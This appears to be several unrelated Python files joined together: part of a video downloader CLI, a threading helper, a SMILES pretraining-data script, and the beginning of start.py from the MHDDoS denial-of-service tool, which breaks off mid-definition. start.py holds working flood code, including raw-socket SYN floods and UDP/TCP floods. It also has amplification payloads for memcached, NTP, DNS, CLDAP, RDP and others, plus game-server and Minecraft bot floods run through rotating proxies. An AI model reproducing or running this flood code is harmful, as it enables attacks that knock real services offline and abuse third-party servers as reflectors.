parser.add_option('-c','--cmd', dest="cmd", action="store_true",default=False,help="Use The Traditional Look") parser.add_option('-u','--url', dest="url",type="string",help="Video / Audio Url") parser.add_option('-C','--config',dest='conf',action="store_true",default=False,help="Read And Use The Config File") parser.add_option('-q','--quiet',dest='verbose',action='store_true',default=False,help="Don't print status messages") parser.add_option('-f','--file',dest='file',type='string',help='Read a file contains a list of urls then download them all') parser.add_option('-o','--output',dest='output',type='string',help='Output File Location') parser.add_option('-s','--aria2c',dest='speed',action='store_true',default=False,help='Use External Downlaod (Aria2c)') parser.add_option('-t','--external',dest='external',type='string',help='Use Prevered External Downloader (wget,curl,ffmpeg ...)') parser.add_option('-T','--external-args',dest='external_args',type='string',help='Set Prevered External Download Args') parser.add_option('-r','--config-file',dest='config_file',type='string',help='Use Config file of Your Choice') parser.add_option('--proxy',dest='proxy',type='string',help='Proxy To Use') parser.add_option('--geobypass',dest='geobypass',action='store_true',default=False,help='Geo Location Bypass') group = optparse.OptionGroup(parser, "Video / Audio", "This Options Can Be Used To Select Video / Audio Like Quality / Format ...") group.add_option('-a','--audio-quality',dest='audio_qual',type='int',help='Specify Audio Quality Between 0 and 1 (0 is the best 1 is the worse)') group.add_option('-v','--video-quality',dest='video_qual',type='string',help='Specify Video Quality Between 4k To 360 (4k,2k,1080p,720p,480p,360p)') group.add_option('-V','--video-format',dest='videoformat',type='string',help='Video Format To Use ex (mp4,mkv..)') group.add_option('-A','--audio-format',dest='audioformat',type='string',help='Audio Format To Use ex (mp3,flac..)') group.add_option('-b','--audio-bitrate',dest='aud_bitrate',type='string',help="Audio Bitrate Default (320kbit)") group.add_option('-x','--extract-audio',dest='extract',action='store_true',help='Extract Audio From a video source') group.add_option('-l','--thumbnail',dest='thumbnail',action='store_true',help='EmbedThumbnail To Video/Audio') group.add_option('-p','--playlist',dest='playlist',action="store_true",default=True,help='Download A Playlist With Specified URL') parser.add_option_group(group) group2 = optparse.OptionGroup(parser, "Authentication Options", "This Options Can Be Used To Set Authentication Method") group2.add_option('-U','--username',dest='username',type='string',help='Username To Authenticate With') group2.add_option('-P','--password',dest='password',type='string',help='Password To Authenticate With') group2.add_option('--twofactor',dest='factor_two',type='string',help='2 Factor Authentication Code') group2.add_option('--videopassword',dest='video_password',type='string',help='Video Password To Use') parser.add_option_group(group2) (options,args) = parser.parse_args() return options,args # Check Aria2c def aria2c_usage(extr,extr_args,usage=False): if usage: if spawn.find_executable('aria2c'): external = 'aria2c' external_args = ['-x16','-k1M'] return external,external_args else: print("[!] 'aria2c' Was Not Found ! ");sys.exit(1) elif extr != None: external = extr if extr_args is None: extr_args = [''] else: extr_args = list(extr_args.split(" ")) external_args = extr_args return external,external_args else: return None,None # Use HLS Format def hls_video(quality): available_format = download.com_reso[0] if "hls" in available_format: if quality in ['1080p','720p','480p','360p']: hls_qual = f"hls-{quality}" else: hls_qual = quality else: return quality return hls_qual # For Sake of Time def move_file(src,loc): try: shutil.move(src,loc) except: try: src = src.split(".")[0] + '.mp3' shutil.move(src,loc) except Exception as e: print("File not found ! Thus We Cannot Move it") print(e) def playlist_checker(link): url = link.split("&");lene = len(url) if lene==3: print("[+] This Playlist Type Is Not Supported") print("[+] Going With Video ID {%s} In The Giving URL "%(url[0]).split("=")[1]) playlist_link.append(url[0]) elif lene==2: playlist_link.append(link) else: return # Where To Save File def output_file(location,title): if platform in ['win64','win32']: if location.endswith('\\'): pass else: location = location+"\\" if location.endswith('/'): pass else: location = location+"/" if extension[0] == None: extension.clear();extension.append('mp4') src = title+"."+extension[0] if os.path.isdir(location): download.move_file(src,location) else: print("[!] Directory Not Found") # Check If Resolution Matches 4k and 2k def check_4k_2k(reso,username,password): recog = download.recog if reso in ["4k","2k"] and str(username) == "None" and str(password) == "None" and recog == True: pass if reso in ["4k","2k"] and str(username) == "None" and str(password) == "None" and recog == False: print(get_colors.red() + "[" + get_colors.white() + "!" + get_colors.red() + "]" + get_colors.white() + " The Platform You're Trying To Download 4k/2k Content From Requires Username/Password \n" + get_colors.sharp_green() + "[" + get_colors.red() + "+" + get_colors.sharp_green() + "]" + get_colors.white() + " It Will Fail Trying To Grab The Content And It Will Defaults Back To The Best Quality Automatically") # This is a fix for PH formats changing to hls which messed up everything def check_ph_hls(url,reso): a,b,c,r = download.get_info(url) r = r['formats'] if reso == "4k": s = "3840x2160" if reso == "2k": s = "2560x1440" if reso == "1080p": s = "1920x1080" if reso == "720p": s = "1280x720" if reso == "480p": s = "854x480" if reso == "360p": s = "426x240" for item in r: if s in item['format']: return item['format_id'] # Save Few Lines Of Code def display_info(url): download.url_recognition(url) title,duration,resolution = download.get_over(url) titlez.append(title) download.print_metadata2(title,duration,resolution) sl(3) def get_me_my_stuff(url,output,video_qual,audio_qual,playlist,extract_audio,quiet,aria2c,external,external_args,aud_bitrate,username,password,vid_password,two_factor,proxy,vid_format,aud_format,geobypass,thumbnail): if not valid.url(url): download.user_print(option=1) return external,external_args = download.aria2c_usage(external,external_args,aria2c) download.playlist_checker(url) if playlist_link == []: pass else: url = playlist_link[0] if output != None: directory.append(output) else: directory.append(os.getcwd()) if download.check_url("https://google.com") and download.check_connection(url): if quiet == False: if audio_qual == None: audio_qual = randint(2,4) if audio_qual >= 0 and video_qual == None and extract_audio == None: video_qual = '1080p' if extract_audio == False or extract_audio == None: download.bncl() extension.append(vid_format) download.display_info(url) download.check_4k_2k(video_qual,username,password) if video_qual in ['4k','2k','1080p','720p','480p','360p']: pass else: download.user_print(option=4);exit(1) video_qual = download.check_ph_hls(url,video_qual) video_qual = download.hls_video(video_qual) s = parser_args("Video",url,video_qual,aud_format,vid_format,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail) s.add_values() else: download.bncl() download.display_info(url) extension.append(aud_format) if audio_qual == 0: q = 'bestaudio/best' elif audio_qual == 1: q = 'worstaudio/worst' else: q = 'bestaudio/best' s = parser_args("Audio",url,q,aud_format,None,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail) s.add_values() else: if audio_qual == None: audio_qual = randint(2,4) if audio_qual >= 0 and video_qual == None and extract_audio == None: video_qual = '1080p' if extract_audio == False or extract_audio == None: download.display_info(url) download.check_4k_2k(video_qual,username,password) if video_qual in ['4k','2k','1080p','720p','480p','360p']: pass else: download.user_print(option=4);exit(1) video_qual = download.check_ph_hls(url,video_qual) video_qual = download.hls_video(video_qual) s = parser_args("Video",url,video_qual,aud_format,vid_format,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail) s.add_values() else: extension.append(aud_format) download.display_info(url) if audio_qual == 0: q = 'bestaudio/best' elif audio_qual == 1: q = 'worstaudio/worst' else: q = 'bestaudio/best' s = parser_args("Audio",url,q,aud_format,None,aud_bitrate,str(playlist),external,external_args,username,password,two_factor,vid_password,proxy,bool(geobypass),thumbnail) s.add_values() # Probably The all def kick_it(file,output,audio_qual,video_qual,aud_bitrate,external,external_args,username,password,video_password,two_factor,proxy,vid_format,aud_format,url=None,quiet=False,extract_audio=False,playlist=False,aria2c=False,geobypass=False,thumbnail=True): if url==None and file==None: print("[!] Cannot Procced if there's no URL Or File list") exit(1) else: if file != None: if os.path.isfile(file): times = 0 while True: with open(file, 'r') as list: url = list.readlines() leng = len(url) if leng > times: url = url[times].strip() download.get_me_my_stuff(url,output,video_qual,audio_qual,playlist,extract_audio,quiet,aria2c,external,external_args,aud_bitrate,username,password,two_factor,video_password,proxy,vid_format,aud_format,geobypass,thumbnail) times += 1 else: break else: download.get_me_my_stuff(url,output,video_qual,audio_qual,playlist,extract_audio,quiet,aria2c,external,external_args,aud_bitrate,username,password,two_factor,video_password,proxy,vid_format,aud_format,geobypass,thumbnail) # The Holy Engine def runner(): options, args = download.command_line() url = options.url file = options.file if url == None: try:url = args[0] except: pass if options.conf or options.config_file != None: try: config_reader.find_config(options.config_file) except: config_reader.find_config('config.rc') output = default_conf[0] audio_quality = default_conf[3] video_quality = default_conf[1] vid_format,audio_format = default_conf[11] aud_bitrate = default_conf[12] quiet = default_conf[5] playlist = default_conf[6] extract_audio = default_conf[4] aria2c = default_conf[7] external = default_conf[8] external_args = default_conf[9] proxy = default_conf[10] geobypass = default_conf[13] thumbnail = default_conf[14] username = options.username password = options.password vid_password = options.video_password factor = options.factor_two else: output = options.output audio_quality = options.audio_qual video_quality = options.video_qual quiet = options.verbose playlist = options.playlist extract_audio = options.extract aria2c = options.speed external = options.external external_args = options.external_args aud_bitrate = options.aud_bitrate username = options.username password = options.password vid_password = options.video_password factor = options.factor_two proxy = options.proxy vid_format = options.videoformat audio_format = options.audioformat geobypass = options.geobypass thumbnail = options.thumbnail if options.cmd: download.run() download.kick_it(file,output,audio_quality,video_quality,aud_bitrate,external,external_args,username,password,vid_password,factor,proxy,vid_format,audio_format,url,quiet,extract_audio,playlist,aria2c,geobypass,thumbnail)
__init__.py
#!/usr/bin/env python # -*- coding: utf-8 -*- #!/usr/bin/python import threading class ResultCatcher: def __init__(self, f): self.f = f self.val = None def __call__(self, *args, **kwargs): self.val = self.f(*args, **kwargs) def run_in_thread(f): def run(*arg, **kwargs): retVal = ResultCatcher(f) t = threading.Thread(target=retVal, args=arg, kwargs=kwargs) t.daemon = True t.start() t.join() return retVal.val run.__name__ = f.__name__ return run
tfrecord_smiles.py
import os import csv import json import pickle import random import argparse import numpy as np import tensorflow as tf import _pickle as cPickle from copy import deepcopy import collections from multiprocessing import Process, Manager from src.pretrain.smiles_util import SmilesTokenizer, Timer __author__ = 'Bonggun Shin' flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_float("masked_lm_prob", 0.15, "Masked LM probability.") flags.DEFINE_integer("max_seq_length", 100, "Maximum sequence length.") flags.DEFINE_integer("max_predictions_per_seq", 15, "Maximum number of masked LM predictions per sequence.") flags.DEFINE_integer("random_seed", 12345, "Random seed for data generation.") flags.DEFINE_string("base_path", "../../data/pretrain", "base path for dataset") # flags.DEFINE_string("input_file", ",".join(["%s/smiles%02d.txt" % (FLAGS.base_path, n) for n in range(79)]), # "Input raw text file (or comma-separated list of files).") flags.DEFINE_string("input_file", ",".join(["%s/molecule/smiles%02d.txt" % (FLAGS.base_path, n) for n in range(50)]), "Input raw text file (or comma-separated list of files).") flags.DEFINE_string( "output_dir", "gs://bdti/mbert/tfr", "Output TF example file (or comma-separated list of files).") def create_int_feature(values): feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values))) return feature def create_float_feature(values): feature = tf.train.Feature(float_list=tf.train.FloatList(value=list(values))) return feature def write_instance_to_example_files(instances, tokenizer, max_seq_length, max_predictions_per_seq, output_files): """Create TF example files from `TrainingInstance`s.""" our_dir = '/'.join(output_files[0].split('/')[:-1]) if not os.path.exists(our_dir): os.makedirs(our_dir) writers = [] for output_file in output_files: writers.append(tf.python_io.TFRecordWriter(output_file)) writer_index = 0 total_written = 0 for (inst_index, instance) in enumerate(instances): input_ids = tokenizer.convert_tokens_to_ids(instance.tokens) input_mask = [1] * len(input_ids) assert len(input_ids) <= max_seq_length while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length masked_lm_positions = list(instance.masked_lm_positions) masked_lm_ids = tokenizer.convert_tokens_to_ids(instance.masked_lm_labels) masked_lm_weights = [1.0] * len(masked_lm_ids) while len(masked_lm_positions) < max_predictions_per_seq: masked_lm_positions.append(0) masked_lm_ids.append(0) masked_lm_weights.append(0.0) features = collections.OrderedDict() features["input_ids"] = create_int_feature(input_ids) features["input_mask"] = create_int_feature(input_mask) features["masked_lm_positions"] = create_int_feature(masked_lm_positions) features["masked_lm_ids"] = create_int_feature(masked_lm_ids) features["masked_lm_weights"] = create_float_feature(masked_lm_weights) tf_example = tf.train.Example(features=tf.train.Features(feature=features)) writers[writer_index].write(tf_example.SerializeToString()) writer_index = (writer_index + 1) % len(writers) total_written += 1 if inst_index < 2: tf.logging.info("*** Example ***") tf.logging.info("tokens: %s" % " ".join(instance.tokens)) for feature_name in features.keys(): feature = features[feature_name] values = [] if feature.int64_list.value: values = feature.int64_list.value elif feature.float_list.value: values = feature.float_list.value tf.logging.info( "%s: %s" % (feature_name, " ".join([str(x) for x in values]))) for writer in writers: writer.close() tf.logging.info("Wrote %d total instances", total_written) def create_masked_lm_predictions(tokens, masked_lm_prob, max_predictions_per_seq, vocab_words, rng): # masked_lm_prob 0.15 # max_seq_length", 170 # max_predictions_per_seq", 26 (170*.15) # vocab_words = list(tokenizer.vocab.keys()) # rng = random.Random(FLAGS.random_seed) MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"]) cand_indexes = [] for (i, token) in enumerate(tokens): if token == "[BEGIN]" or token == "[END]": continue cand_indexes.append(i) rng.shuffle(cand_indexes) output_tokens = list(tokens) num_to_predict = min(max_predictions_per_seq, max(1, int(round(len(tokens) * masked_lm_prob)))) masked_lms = [] covered_indexes = set() for index in cand_indexes: if len(masked_lms) >= num_to_predict: break if index in covered_indexes: continue covered_indexes.add(index) masked_token = None # 80% of the time, replace with [MASK] if rng.random() < 0.8: masked_token = "[MASK]" else: # 10% of the time, keep original if rng.random() < 0.5: masked_token = tokens[index] # 10% of the time, replace with random word else: masked_token = vocab_words[rng.randint(4, len(vocab_words) - 1)] output_tokens[index] = masked_token masked_lms.append(MaskedLmInstance(index=index, label=tokens[index])) masked_lms = sorted(masked_lms, key=lambda x: x.index) masked_lm_positions = [] masked_lm_labels = [] for p in masked_lms: masked_lm_positions.append(p.index) masked_lm_labels.append(p.label) return (output_tokens, masked_lm_positions, masked_lm_labels) class TrainingInstance(object): """A single training instance (sentence pair).""" def __init__(self, tokens, masked_lm_positions, masked_lm_labels): self.tokens = tokens self.masked_lm_positions = masked_lm_positions self.masked_lm_labels = masked_lm_labels def __str__(self): s = "" s += "tokens: %s\n" % (" ".join(self.tokens)) s += "masked_lm_positions: %s\n" % (" ".join([str(x) for x in self.masked_lm_positions])) s += "masked_lm_labels: %s\n" % (" ".join(self.masked_lm_labels)) s += "\n" return s def __repr__(self): return self.__str__() def truncate_seq_pair(tokens, max_num_tokens, rng): while True: total_length = len(tokens) if total_length <= max_num_tokens: break trunc_tokens = tokens assert len(trunc_tokens) >= 1 # We want to sometimes truncate from the front and sometimes from the # back to add more randomness and avoid biases. if rng.random() < 0.5: del trunc_tokens[0] else: trunc_tokens.pop() # def read_smiles(input_files): # smiles_list = [] # len_list = [] # for i, input_file in enumerate(input_files): # tf.logging.info("[%d/%d]Current File: %s" % (i, len(input_files), input_file)) # # with tf.gfile.GFile("%s/smiles_sample.csv" % (FLAGS.base_path), "r") as reader: # with tf.gfile.GFile(input_file, "r") as reader: # 97,092,853, 97M # while True: # line = reader.readline() # if not line: # break # smiles = line.strip().split(',')[1] # smiles_list.append(smiles) # len_list.append(len(smiles)) # # tokenizer = SmilesTokenizer("%s/vocab_smiles.txt" % (FLAGS.base_path)) # vocab_words = list(tokenizer.vocab.keys()) # rng = random.Random(FLAGS.random_seed) # max_num_tokens = FLAGS.max_seq_length - 1 # # # for s in smiles_list: # tokens = tokenizer.tokenize(s) # truncate_seq_pair(tokens, max_num_tokens, rng) # tokens.insert(0, "[CLS]") # (tokens, masked_lm_positions, masked_lm_labels) = create_masked_lm_predictions(tokens, FLAGS.masked_lm_prob, # FLAGS.max_predictions_per_seq, # vocab_words, rng) # instance = TrainingInstance( # tokens=tokens, # masked_lm_positions=masked_lm_positions, # masked_lm_labels=masked_lm_labels) # instances.append(instance) # # return instances, tokenizer # # def worker_speed_test(input_file): # tokenizer = SmilesTokenizer("%s/vocab_smiles.txt" % (FLAGS.base_path)) # vocab_words = list(tokenizer.vocab.keys()) # rng = random.Random(FLAGS.random_seed) # with Timer("read_smiles_worker"): # read_smiles_worker(2, input_file, tokenizer, vocab_words, rng) # def tfrecord_smiles_multiprocess(input_files): tokenizer = SmilesTokenizer("%s/vocab_smiles.txt" % (FLAGS.base_path)) vocab_words = list(tokenizer.vocab.keys()) rng = random.Random(FLAGS.random_seed) # manager = Manager() jobs = [] # instances = manager.list() for wid, input_file in enumerate(input_files): p = Process(target=read_smiles_worker, args=(wid, input_file, tokenizer, vocab_words, rng)) jobs.append(p) for proc in jobs: proc.start() for proc in jobs: proc.join() def read_smiles_worker(wid, input_file, tokenizer, vocab_words, rng): len_list = [] max_num_tokens = FLAGS.max_seq_length - 1 instances = [] tf.logging.info("[worker %d] Current File: %s" % (wid, input_file)) with tf.gfile.GFile(input_file, "r") as reader: # 97,092,853, 97M while True: line = reader.readline() if not line: break smiles = line.strip().split(',')[1] len_list.append(len(smiles)) tokens = tokenizer.tokenize(smiles) truncate_seq_pair(tokens, max_num_tokens, rng) tokens.insert(0, "[CLS]") (tokens, masked_lm_positions, masked_lm_labels) = create_masked_lm_predictions(tokens, FLAGS.masked_lm_prob, FLAGS.max_predictions_per_seq, vocab_words, rng) instance = TrainingInstance( tokens=tokens, masked_lm_positions=masked_lm_positions, masked_lm_labels=masked_lm_labels) if len(instances) % 100000 == 0: print(len(instances)) instances.append(instance) # 0: 0-9 # 1: 10-19 # ... # 49: 490-499 output_files = ["%s/smiles.%03d" % (FLAGS.output_dir, n) for n in range(wid*10, wid*10+10)] tf.logging.info("*** Writing to output files ***") for output_file in output_files: tf.logging.info(" %s", output_file) write_instance_to_example_files(instances, tokenizer, FLAGS.max_seq_length, FLAGS.max_predictions_per_seq, output_files) if __name__=="__main__": tf.logging.set_verbosity(tf.logging.INFO) tf.logging.info("*** CREATING TFRECORD ***") # # Speed test # input_file = "%s/moelecule/10k.txt" % FLAGS.base_path # worker_speed_test(input_file) # exit() input_files = [] for input_pattern in FLAGS.input_file.split(","): input_files.extend(tf.gfile.Glob(input_pattern)) tfrecord_smiles_multiprocess(input_files)
start.py
#!/usr/bin/env python3 from concurrent.futures import ThreadPoolExecutor, as_completed from contextlib import suppress from itertools import cycle from json import load from logging import basicConfig, getLogger, shutdown from math import log2, trunc from multiprocessing import RawValue from os import urandom as randbytes from pathlib import Path from random import choice as randchoice from random import randint from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM, SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname, gethostname, socket) from ssl import CERT_NONE, SSLContext, create_default_context from struct import pack as data_pack from subprocess import run from sys import argv from sys import exit as _exit from threading import Event, Thread from time import sleep, time from typing import Any, List, Set, Tuple from urllib import parse from uuid import UUID, uuid4 from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles from PyRoxy import Tools as ProxyTools from certifi import where from cfscrape import create_scraper from dns import resolver from icmplib import ping from impacket.ImpactPacket import IP, TCP, UDP, Data from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory from requests import Response, Session, exceptions, get from yarl import URL basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s', datefmt="%H:%M:%S") logger = getLogger("MHDDoS") logger.setLevel("INFO") ctx: SSLContext = create_default_context(cafile=where()) ctx.check_hostname = False ctx.verify_mode = CERT_NONE __version__: str = "2.4 SNAPSHOT" __dir__: Path = Path(__file__).parent __ip__: Any = None def getMyIPAddress(): global __ip__ if __ip__: return __ip__ with suppress(Exception): __ip__ = get('https://api.my-ip.io/ip', timeout=.1).text with suppress(Exception): __ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"] with suppress(Exception): __ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"] with suppress(Exception): __ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text) with suppress(Exception): __ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text) with suppress(Exception): __ip__ = get('https://ip.42.pl/raw', timeout=.1).text return getMyIPAddress() def exit(*message): if message: logger.error(" ".join(message)) shutdown() _exit(1) class Methods: LAYER7_METHODS: Set[str] = { "CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD", "NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM", "APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER" } LAYER4_METHODS: Set[str] = { "TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD", "CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE", "CLDAP" } ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS} google_agents = [ "Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, " "like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; " "+http://www.google.com/bot.html)) " "Googlebot/2.1 (+http://www.google.com/bot.html)", "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" ] class Counter(object): def __init__(self, value=0): self._value = RawValue('i', value) def __iadd__(self, value): self._value.value += value return self def __int__(self): return self._value.value def set(self, value): self._value.value = value return self REQUESTS_SENT = Counter() BYTES_SEND = Counter() class Tools: @staticmethod def humanbytes(i: int, binary: bool = False, precision: int = 2): MULTIPLES = [ "B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B" ] if i > 0: base = 1024 if binary else 1000 multiple = trunc(log2(i) / log2(base)) value = i / pow(base, multiple) suffix = MULTIPLES[multiple].format("i" if binary else "") return f"{value:.{precision}f} {suffix}" else: return f"-- B" @staticmethod def humanformat(num: int, precision: int = 2): suffixes = ['', 'k', 'm', 'g', 't', 'p'] if num > 999: obje = sum( [abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))]) return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}' else: return num @staticmethod def sizeOfRequest(res: Response) -> int: size: int = len(res.request.method) size += len(res.request.url) size += len('\r\n'.join(f'{key}: {value}' for key, value in res.request.headers.items())) return size @staticmethod def randchr(lengh: int) -> str: return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip() @staticmethod def send(sock: socket, packet: bytes): global BYTES_SEND, REQUESTS_SENT if not sock.send(packet): return False BYTES_SEND += len(packet) REQUESTS_SENT += 1 return True @staticmethod def sendto(sock, packet, target): global BYTES_SEND, REQUESTS_SENT if not sock.sendto(packet, target): return False BYTES_SEND += len(packet) REQUESTS_SENT += 1 return True @staticmethod def safe_close(sock=None): if sock: sock.close() class Minecraft: @staticmethod def varint(d: int) -> bytes: o = b'' while True: b = d & 0x7F d >>= 7 o += data_pack("B", b | (0x80 if d > 0 else 0)) if d == 0: break return o @staticmethod def data(*payload: bytes) -> bytes: payload = b''.join(payload) return Minecraft.varint(len(payload)) + payload @staticmethod def short(integer: int) -> bytes: return data_pack('>H', integer) @staticmethod def handshake(target: Tuple[str, int], version: int, state: int) -> bytes: return Minecraft.data(Minecraft.varint(0x00), Minecraft.varint(version), Minecraft.data(target[0].encode()), Minecraft.short(target[1]), Minecraft.varint(state)) @staticmethod def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes: return Minecraft.data(Minecraft.varint(0x00), Minecraft.varint(version), Minecraft.data( target[0].encode(), b"\x00", ip.encode(), b"\x00", uuid.hex.encode() ), Minecraft.short(target[1]), Minecraft.varint(state)) @staticmethod def login(username: str) -> bytes: if isinstance(username, str): username = username.encode() return Minecraft.data(Minecraft.varint(0x00), Minecraft.data(username)) @staticmethod def keepalive(num_id: int) -> bytes: return Minecraft.data(Minecraft.varint(0x00), Minecraft.varint(num_id)) @staticmethod def chat(message: str) -> bytes: return Minecraft.data(Minecraft.varint(0x01), Minecraft.data(message.encode())) # noinspection PyBroadException,PyUnusedLocal class Layer4(Thread): _method: str _target: Tuple[str, int] _ref: Any SENT_FLOOD: Any _amp_payloads = cycle _proxies: List[Proxy] = None def __init__(self, target: Tuple[str, int], ref: List[str] = None, method: str = "TCP", synevent: Event = None, proxies: Set[Proxy] = None): Thread.__init__(self, daemon=True) self._amp_payload = None self._amp_payloads = cycle([]) self._ref = ref self._method = method self._target = target self._synevent = synevent if proxies: self._proxies = list(proxies) def run(self) -> None: if self._synevent: self._synevent.wait() self.select(self._method) while self._synevent.is_set(): self.SENT_FLOOD() def open_connection(self, conn_type=AF_INET, sock_type=SOCK_STREAM, proto_type=IPPROTO_TCP): if self._proxies: s = randchoice(self._proxies).open_socket( conn_type, sock_type, proto_type) else: s = socket(conn_type, sock_type, proto_type) s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) s.connect(self._target) return s def select(self, name): self.SENT_FLOOD = self.TCP if name == "UDP": self.SENT_FLOOD = self.UDP if name == "SYN": self.SENT_FLOOD = self.SYN if name == "VSE": self.SENT_FLOOD = self.VSE if name == "TS3": self.SENT_FLOOD = self.TS3 if name == "MCPE": self.SENT_FLOOD = self.MCPE if name == "FIVEM": self.SENT_FLOOD = self.FIVEM if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT if name == "CPS": self.SENT_FLOOD = self.CPS if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION if name == "MCBOT": self.SENT_FLOOD = self.MCBOT if name == "RDP": self._amp_payload = ( b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "CLDAP": self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00' b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "MEM": self._amp_payload = ( b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "CHAR": self._amp_payload = (b'\x01', 19) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "ARD": self._amp_payload = (b'\x00\x14\x00\x00', 3283) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "NTP": self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "DNS": self._amp_payload = ( b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00' b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) def TCP(self) -> None: s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: while Tools.send(s, randbytes(1024)): continue Tools.safe_close(s) def MINECRAFT(self) -> None: handshake = Minecraft.handshake(self._target, 74, 1) ping = Minecraft.data(b'\x00') s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: while Tools.send(s, handshake): Tools.send(s, ping) Tools.safe_close(s) def CPS(self) -> None: global REQUESTS_SENT s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: REQUESTS_SENT += 1 Tools.safe_close(s) def alive_connection(self) -> None: s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: while s.recv(1): continue Tools.safe_close(s) def CONNECTION(self) -> None: global REQUESTS_SENT with suppress(Exception): Thread(target=self.alive_connection).start() REQUESTS_SENT += 1 def UDP(self) -> None: s = None with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, randbytes(1024), self._target): continue Tools.safe_close(s) def SYN(self) -> None: payload = self._genrate_syn() s = None with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s: s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def AMP(self) -> None: payload = next(self._amp_payloads) s = None with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s: s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) while Tools.sendto(s, *payload): continue Tools.safe_close(s) def MCBOT(self) -> None: s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: Tools.send(s, Minecraft.handshake_forwarded(self._target, 47, 2, ProxyTools.Random.rand_ipv4(), uuid4())) Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}")) sleep(1.5) c = 360 while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))): c -= 1 if c: continue c = 360 Tools.send(s, Minecraft.chat(Tools.randchr(100))) Tools.safe_close(s) def VSE(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65' b'\x20\x51\x75\x65\x72\x79\x00') with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def FIVEM(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00' with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def TS3(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02' with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def 